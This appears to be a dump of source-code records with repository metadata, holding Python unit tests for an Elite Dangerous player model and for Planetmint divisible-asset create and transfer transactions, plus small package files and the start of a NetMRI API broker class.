self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "dummy"
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "Open"
self.assertTrue(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "open"
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "Group"
self.assertFalse(cmdr.in_open())
cmdr = EDPlayerOne()
cmdr.game_mode = "Solo"
self.assertFalse(cmdr.in_open())
def test_lifecycle_and_mode(self):
cmdr = EDPlayerOne()
ship = edvehicles.EDVehicleFactory.from_internal_name("empire_trader")
cmdr.game_mode = "Open"
cmdr.inception()
cmdr.update_vehicle_if_obsolete(ship)
self.assertTrue(cmdr.in_open())
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
cmdr.killed()
self.assertFalse(cmdr.in_open())
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
cmdr.resurrect()
self.assertTrue(cmdr.in_open())
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
cmdr.killed()
cmdr.resurrect(rebought = False)
self.assertTrue(cmdr.in_open())
self.assertNotEqual(cmdr.vehicle_type(), "Imperial Clipper")
def test_join_wing(self):
cmdr = EDPlayerOne()
cmdr.inception()
wing_members = ["Ozram", "Arguendo", "Patch"]
for member in wing_members:
self.assertFalse(cmdr.is_wingmate(member))
self.assertFalse(cmdr.is_wingmate("dummy"))
cmdr.join_wing(wing_members)
for member in wing_members:
self.assertTrue(cmdr.is_wingmate(member))
self.assertEquals(len(cmdr.wing.wingmates), 3)
self.assertFalse(cmdr.is_wingmate("dummy"))
cmdr.leave_wing()
self.assertEquals(len(cmdr.wing.wingmates), 0)
for member in wing_members:
self.assertFalse(cmdr.is_wingmate(member))
def test_add_to_wing(self):
cmdr = EDPlayerOne()
cmdr.inception()
wing_members = ["Ozram", "Arguendo", "Patch"]
for member in wing_members:
cmdr.add_to_wing(member)
self.assertTrue(cmdr.is_wingmate(member))
self.assertEquals(len(cmdr.wing.wingmates), 3)
cmdr.add_to_wing(wing_members[0])
self.assertEquals(len(cmdr.wing.wingmates), 3)
for member in wing_members:
self.assertTrue(cmdr.is_wingmate(member))
self.assertFalse(cmdr.is_wingmate("dummy"))
def test_vehicle_type(self):
cmdr = EDPlayerOne()
ship = edvehicles.EDVehicleFactory.from_internal_name("empire_trader")
cmdr.update_vehicle_if_obsolete(ship)
self.assertEqual(cmdr.vehicle_type(), "Imperial Clipper")
if __name__ == '__main__':
main() | 31.473282 | 78 | 0.630366 | 467 | 4,123 | 5.32334 | 0.143469 | 0.114642 | 0.13757 | 0.109815 | 0.847144 | 0.823411 | 0.797667 | 0.703942 | 0.703942 | 0.703942 | 0 | 0.001629 | 0.255639 | 4,123 | 131 | 79 | 31.473282 | 0.808407 | 0 | 0 | 0.769231 | 0 | 0 | 0.052861 | 0 | 0 | 0 | 0 | 0 | 0.346154 | 1 | 0.057692 | false | 0 | 0.038462 | 0 | 0.105769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4a8d0ac9a03900442eacc2ebc561e495cb17cac8 | 61 | py | Python | Helper/Math/__init__.py | robotsorcerer/LevelSetPy | 54064ee7fd0144e0d658dd4f6121cbc1fda664b9 | [
"MIT"
] | 4 | 2022-03-14T07:04:08.000Z | 2022-03-14T18:08:56.000Z | Helper/Math/__init__.py | robotsorcerer/LevelSetPy | 54064ee7fd0144e0d658dd4f6121cbc1fda664b9 | [
"MIT"
] | null | null | null | Helper/Math/__init__.py | robotsorcerer/LevelSetPy | 54064ee7fd0144e0d658dd4f6121cbc1fda664b9 | [
"MIT"
] | null | null | null | from .cell_mat_trace import *
from .cell_mat_mult import *
| 20.333333 | 30 | 0.770492 | 10 | 61 | 4.3 | 0.6 | 0.372093 | 0.511628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163934 | 61 | 2 | 31 | 30.5 | 0.843137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4364544c03b207c2bdfd7828822a70416ac0e45f | 125 | py | Python | src/bisi/resources/config/__init__.py | UnyieldingOrca/bisi | 38f55e497aeb3483b73ffeedda6bddc6c25aa9b4 | [
"Apache-2.0"
] | 1 | 2022-02-02T02:32:44.000Z | 2022-02-02T02:32:44.000Z | src/bisi/resources/config/__init__.py | UnyieldingOrca/bisi | 38f55e497aeb3483b73ffeedda6bddc6c25aa9b4 | [
"Apache-2.0"
] | 7 | 2022-02-04T00:27:33.000Z | 2022-02-22T18:01:40.000Z | src/bisi/resources/config/__init__.py | UnyieldingOrca/bisi | 38f55e497aeb3483b73ffeedda6bddc6c25aa9b4 | [
"Apache-2.0"
] | 1 | 2022-02-13T20:00:58.000Z | 2022-02-13T20:00:58.000Z |
from .local_job_config import LocalJobConfig
from .ecr_config import ECRConfig
from .batch_job_config import BatchJobConfig
| 25 | 44 | 0.872 | 17 | 125 | 6.117647 | 0.588235 | 0.346154 | 0.288462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104 | 125 | 4 | 45 | 31.25 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
43774ef5c716cbc44b052b956f0deb7a4ef07d08 | 111 | py | Python | tests/parser/choice.35.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.35.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.35.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
a | b :- d.
c | d.
:- c, not d.
"""
output = """
a | b :- d.
c | d.
:- c, not d.
"""
| 7.4 | 13 | 0.279279 | 18 | 111 | 1.722222 | 0.388889 | 0.258065 | 0.193548 | 0.258065 | 0.645161 | 0.645161 | 0.645161 | 0.645161 | 0 | 0 | 0 | 0 | 0.414414 | 111 | 14 | 14 | 7.928571 | 0.476923 | 0 | 0 | 0.8 | 0 | 0 | 0.693069 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
437da55ef21ad0e83ab447b88118aaf76636904c | 23,672 | py | Python | tests/assets/test_divisible_assets.py | eckelj/planetmint | c7086a1982d781cb7ace62f1dff5cd63ed016ae0 | [
"Apache-2.0"
] | null | null | null | tests/assets/test_divisible_assets.py | eckelj/planetmint | c7086a1982d781cb7ace62f1dff5cd63ed016ae0 | [
"Apache-2.0"
] | null | null | null | tests/assets/test_divisible_assets.py | eckelj/planetmint | c7086a1982d781cb7ace62f1dff5cd63ed016ae0 | [
"Apache-2.0"
] | null | null | null | # Copyright © 2020 Interplanetary Database Association e.V.,
# Planetmint and IPDB software contributors.
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import pytest
import random
from planetmint.common.exceptions import DoubleSpend
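# Note (added): `alice`, `user_pk`, `user_sk` and `b` in the test signatures
# below are pytest fixtures assumed to come from the suite's conftest; `b` is
# the Planetmint instance the transactions are validated against.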
# CREATE divisible asset
# Single input
# Single owners_before
# Single output
# Single owners_after
def test_single_in_single_own_single_out_single_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 1
assert tx_signed.outputs[0].amount == 100
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Single owners_after per output
def test_single_in_single_own_multiple_out_single_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk], 50)],
asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 2
assert tx_signed.outputs[0].amount == 50
assert tx_signed.outputs[1].amount == 50
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Single owners_before
# Single output
# Multiple owners_after
def test_single_in_single_own_single_out_multiple_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk, user_pk], 100)], asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 1
assert tx_signed.outputs[0].amount == 100
output = tx_signed.outputs[0].to_dict()
assert 'subconditions' in output['condition']['details']
assert len(output['condition']['details']['subconditions']) == 2
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Mix: one output with a single owners_after, one output with multiple
# owners_after
def test_single_in_single_own_multiple_out_mix_own_create(alice, user_pk, b):
from planetmint.models import Transaction
tx = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk, user_pk], 50)],
asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 2
assert tx_signed.outputs[0].amount == 50
assert tx_signed.outputs[1].amount == 50
output_cid1 = tx_signed.outputs[1].to_dict()
assert 'subconditions' in output_cid1['condition']['details']
assert len(output_cid1['condition']['details']['subconditions']) == 2
assert len(tx_signed.inputs) == 1
# CREATE divisible asset
# Single input
# Multiple owners_before
# Output combinations already tested above
def test_single_in_multiple_own_single_out_single_own_create(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
tx = Transaction.create([alice.public_key, user_pk], [([user_pk], 100)], asset={'name': random.random()})
tx_signed = tx.sign([alice.private_key, user_sk])
assert tx_signed.validate(b) == tx_signed
assert len(tx_signed.outputs) == 1
assert tx_signed.outputs[0].amount == 100
assert len(tx_signed.inputs) == 1
ffill = _fulfillment_to_details(tx_signed.inputs[0].fulfillment)
assert 'subconditions' in ffill
assert len(ffill['subconditions']) == 2
# TRANSFER divisible asset
# Single input
# Single owners_before
# Single output
# Single owners_after
def test_single_in_single_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b)
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 1
# TRANSFER divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Single owners_after
def test_single_in_single_own_multiple_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 50), ([alice.public_key], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 2
assert tx_transfer_signed.outputs[0].amount == 50
assert tx_transfer_signed.outputs[1].amount == 50
assert len(tx_transfer_signed.inputs) == 1
# TRANSFER divisible asset
# Single input
# Single owners_before
# Single output
# Multiple owners_after
def test_single_in_single_own_single_out_multiple_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key, alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
condition = tx_transfer_signed.outputs[0].to_dict()
assert 'subconditions' in condition['condition']['details']
assert len(condition['condition']['details']['subconditions']) == 2
assert len(tx_transfer_signed.inputs) == 1
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Single input
# Single owners_before
# Multiple outputs
# Mix: one output with a single owners_after, one output with multiple
# owners_after
def test_single_in_single_own_multiple_out_mix_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 50), ([alice.public_key, alice.public_key], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 2
assert tx_transfer_signed.outputs[0].amount == 50
assert tx_transfer_signed.outputs[1].amount == 50
output_cid1 = tx_transfer_signed.outputs[1].to_dict()
assert 'subconditions' in output_cid1['condition']['details']
assert len(output_cid1['condition']['details']['subconditions']) == 2
assert len(tx_transfer_signed.inputs) == 1
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Single input
# Multiple owners_before
# Single output
# Single owners_after
def test_single_in_multiple_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([alice.public_key, user_pk], 100)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 1
ffill = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
assert 'subconditions' in ffill
assert len(ffill['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Single owners_before per input
# Single output
# Single owners_after
def test_multiple_in_single_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b)
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Multiple owners_before per input
# Single output
# Single owners_after
def test_multiple_in_multiple_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk, alice.public_key], 50),
([user_pk, alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 2
ffill_fid0 = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
ffill_fid1 = _fulfillment_to_details(tx_transfer_signed.inputs[1].fulfillment)
assert 'subconditions' in ffill_fid0
assert 'subconditions' in ffill_fid1
assert len(ffill_fid0['subconditions']) == 2
assert len(ffill_fid1['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Mix: one input with a single owners_before, one input with multiple
# owners_before
# Single output
# Single owners_after
def test_multiple_in_mix_own_single_out_single_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk, alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 100
assert len(tx_transfer_signed.inputs) == 2
ffill_fid0 = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
ffill_fid1 = _fulfillment_to_details(tx_transfer_signed.inputs[1].fulfillment)
assert 'subconditions' not in ffill_fid0
assert 'subconditions' in ffill_fid1
assert len(ffill_fid1['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs
# Mix: one input with a single owners_before, one input with multiple
# owners_before
# Multiple outputs
# Mix: one output with a single owners_after, one output with multiple
# owners_after
def test_multiple_in_mix_own_multiple_out_mix_own_transfer(alice, b, user_pk,
user_sk):
from planetmint.models import Transaction
from planetmint.common.transaction import _fulfillment_to_details
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([user_pk, alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 50), ([alice.public_key, user_pk], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([alice.private_key, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 2
assert tx_transfer_signed.outputs[0].amount == 50
assert tx_transfer_signed.outputs[1].amount == 50
assert len(tx_transfer_signed.inputs) == 2
cond_cid0 = tx_transfer_signed.outputs[0].to_dict()
cond_cid1 = tx_transfer_signed.outputs[1].to_dict()
assert 'subconditions' not in cond_cid0['condition']['details']
assert 'subconditions' in cond_cid1['condition']['details']
assert len(cond_cid1['condition']['details']['subconditions']) == 2
ffill_fid0 = _fulfillment_to_details(tx_transfer_signed.inputs[0].fulfillment)
ffill_fid1 = _fulfillment_to_details(tx_transfer_signed.inputs[1].fulfillment)
assert 'subconditions' not in ffill_fid0
assert 'subconditions' in ffill_fid1
assert len(ffill_fid1['subconditions']) == 2
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
# TRANSFER divisible asset
# Multiple inputs from different transactions
# Single owners_before
# Single output
# Single owners_after
def test_multiple_in_different_transactions(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
# CREATE divisible asset
    # `alice` creates a divisible asset and assigns 50 shares to `user_pk`
    # and 50 shares to herself
tx_create = Transaction.create([alice.public_key], [([user_pk], 50), ([alice.public_key], 50)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER divisible asset
    # `alice` transfers her 50 shares to `user_pk`
# after this transaction `user_pk` will have a total of 100 shares
# split across two different transactions
tx_transfer1 = Transaction.transfer(tx_create.to_inputs([1]),
[([user_pk], 50)],
asset_id=tx_create.id)
tx_transfer1_signed = tx_transfer1.sign([alice.private_key])
# TRANSFER
    # `user_pk` combines two different transactions with 50 shares each and
    # transfers a total of 100 shares back to `alice`
tx_transfer2 = Transaction.transfer(tx_create.to_inputs([0]) +
tx_transfer1.to_inputs([0]),
                                        [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer2_signed = tx_transfer2.sign([user_sk])
b.store_bulk_transactions([tx_create_signed, tx_transfer1_signed])
assert tx_transfer2_signed.validate(b) == tx_transfer2_signed
assert len(tx_transfer2_signed.outputs) == 1
assert tx_transfer2_signed.outputs[0].amount == 100
assert len(tx_transfer2_signed.inputs) == 2
fid0_input = tx_transfer2_signed.inputs[0].fulfills.txid
fid1_input = tx_transfer2_signed.inputs[1].fulfills.txid
assert fid0_input == tx_create.id
assert fid1_input == tx_transfer1.id
# In a TRANSFER transaction of a divisible asset the amount being spent in the
# inputs needs to match the amount being sent in the outputs.
# In other words `amount_in_inputs - amount_in_outputs == 0`
def test_amount_error_transfer(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
from planetmint.common.exceptions import AmountError
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
b.store_bulk_transactions([tx_create_signed])
# TRANSFER
# output amount less than input amount
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 50)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
with pytest.raises(AmountError):
tx_transfer_signed.validate(b)
# TRANSFER
# output amount greater than input amount
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 101)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
with pytest.raises(AmountError):
tx_transfer_signed.validate(b)
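# Editorial sketch, not part of the original suite: the balanced counterpart
# to test_amount_error_transfer above. With 100 spent by the input and
# 60 + 40 produced by the outputs, amount_in_inputs - amount_in_outputs == 0,
# so the TRANSFER validates. The fixtures (alice, b, user_pk, user_sk) are
# assumed to behave as in the tests above.
def test_amount_balanced_transfer_sketch(alice, b, user_pk, user_sk):
    from planetmint.models import Transaction
    # CREATE divisible asset
    tx_create = Transaction.create([alice.public_key], [([user_pk], 100)], asset={'name': random.random()})
    tx_create_signed = tx_create.sign([alice.private_key])
    b.store_bulk_transactions([tx_create_signed])
    # TRANSFER with 60 + 40 == 100: the amounts balance, so validation passes
    tx_transfer = Transaction.transfer(tx_create.to_inputs(),
                                       [([alice.public_key], 60), ([alice.public_key], 40)],
                                       asset_id=tx_create.id)
    tx_transfer_signed = tx_transfer.sign([user_sk])
    assert tx_transfer_signed.validate(b) == tx_transfer_signed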
def test_threshold_same_public_key(alice, b, user_pk, user_sk):
# If we try to fulfill a threshold condition where each subcondition has
    # the same key, get_subcondition_from_vk will always return the first
    # subcondition. This means that only the 1st subfulfillment will be
    # generated.
    # Creating threshold conditions with the same key does not make sense, but
    # that does not mean that the code shouldn't work.
from planetmint.models import Transaction
# CREATE divisible asset
tx_create = Transaction.create([alice.public_key], [([user_pk, user_pk], 100)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# TRANSFER
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 100)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk, user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
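# Editorial sketch illustrating the structure the test above relies on; it
# assumes the condition-details layout used elsewhere in this file (a
# 'subconditions' list whose entries carry a 'public_key').
def test_threshold_same_public_key_structure_sketch(alice, user_pk):
    from planetmint.models import Transaction
    tx = Transaction.create([alice.public_key], [([user_pk, user_pk], 100)],
                            asset={'name': random.random()})
    details = tx.outputs[0].to_dict()['condition']['details']
    # a two-owner output is a threshold condition with two subconditions...
    assert len(details['subconditions']) == 2
    # ...and here both subconditions reference the same verifying key
    assert {sub['public_key'] for sub in details['subconditions']} == {user_pk}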
def test_sum_amount(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
# CREATE divisible asset with 3 outputs with amount 1
tx_create = Transaction.create([alice.public_key], [([user_pk], 1), ([user_pk], 1), ([user_pk], 1)],
asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# create a transfer transaction with one output and check if the amount
# is 3
tx_transfer = Transaction.transfer(tx_create.to_inputs(), [([alice.public_key], 3)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 1
assert tx_transfer_signed.outputs[0].amount == 3
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
def test_divide(alice, b, user_pk, user_sk):
from planetmint.models import Transaction
# CREATE divisible asset with 1 output with amount 3
tx_create = Transaction.create([alice.public_key], [([user_pk], 3)], asset={'name': random.random()})
tx_create_signed = tx_create.sign([alice.private_key])
# create a transfer transaction with 3 outputs and check if the amount
# of each output is 1
tx_transfer = Transaction.transfer(tx_create.to_inputs(),
[([alice.public_key], 1), ([alice.public_key], 1), ([alice.public_key], 1)],
asset_id=tx_create.id)
tx_transfer_signed = tx_transfer.sign([user_sk])
b.store_bulk_transactions([tx_create_signed])
assert tx_transfer_signed.validate(b) == tx_transfer_signed
assert len(tx_transfer_signed.outputs) == 3
for output in tx_transfer_signed.outputs:
assert output.amount == 1
b.store_bulk_transactions([tx_transfer_signed])
with pytest.raises(DoubleSpend):
tx_transfer_signed.validate(b)
| 39.851852 | 115 | 0.684606 | 3,050 | 23,672 | 5.015738 | 0.056066 | 0.085632 | 0.107727 | 0.0436 | 0.894104 | 0.868676 | 0.85972 | 0.85253 | 0.838018 | 0.82684 | 0 | 0.01755 | 0.215275 | 23,672 | 593 | 116 | 39.919056 | 0.805932 | 0.154444 | 0 | 0.745399 | 0 | 0 | 0.029021 | 0 | 0 | 0 | 0 | 0 | 0.303681 | 1 | 0.058282 | false | 0 | 0.08589 | 0 | 0.144172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4390ee325cedc1c98efabd0b34fb9d32636693cd | 103,735 | py | Python | infoblox_netmri/api/broker/v3_6_0/device_routing_proto_peer_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | ["Apache-2.0"] | null | null | null | infoblox_netmri/api/broker/v3_6_0/device_routing_proto_peer_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | ["Apache-2.0"] | null | null | null | infoblox_netmri/api/broker/v3_6_0/device_routing_proto_peer_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | ["Apache-2.0"] | null | null | null |
from ..broker import Broker
class DeviceRoutingProtoPeerBroker(Broker):
controller = "device_routing_proto_peers"
def show(self, **kwargs):
"""Shows the details for the specified device routing proto peer.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
